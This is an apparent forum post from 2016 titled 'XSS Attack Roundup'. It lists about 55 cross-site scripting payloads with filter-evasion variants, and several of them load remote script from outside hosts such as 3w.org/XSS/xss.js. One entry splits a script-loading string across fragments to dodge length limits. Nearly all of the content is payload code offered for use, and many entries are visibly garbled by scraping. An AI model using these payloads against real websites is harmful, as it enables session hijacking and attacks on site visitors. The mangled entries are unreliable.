XSS Attack Roundup

OP, posted 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab breaking up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab breaking up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (all fragments on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective domestically, because there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front of the JavaScript
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>